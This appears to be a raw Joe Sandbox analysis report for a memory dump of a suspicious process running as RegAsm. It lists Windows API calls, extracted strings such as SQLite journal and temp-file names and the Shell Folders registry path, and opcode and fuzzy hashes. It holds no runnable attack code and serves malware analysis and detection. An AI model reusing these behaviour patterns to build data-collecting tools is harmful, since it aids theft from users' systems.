                                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                                      • Opcode ID: 7d95f287df1cc243a0b50aae9b96e7708f3abc865263beea37468beb3a21e1ea
                                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d95f287df1cc243a0b50aae9b96e7708f3abc865263beea37468beb3a21e1ea
                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                      • String ID: gj
                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1470729244-0
                                                                                                                                                                      • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                      • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                      APIs
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4131475296-0
                                                                                                                                                                      • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                      • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                                      • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                      APIs
                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                                      • Opcode ID: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                      • Opcode Fuzzy Hash: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                                      • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
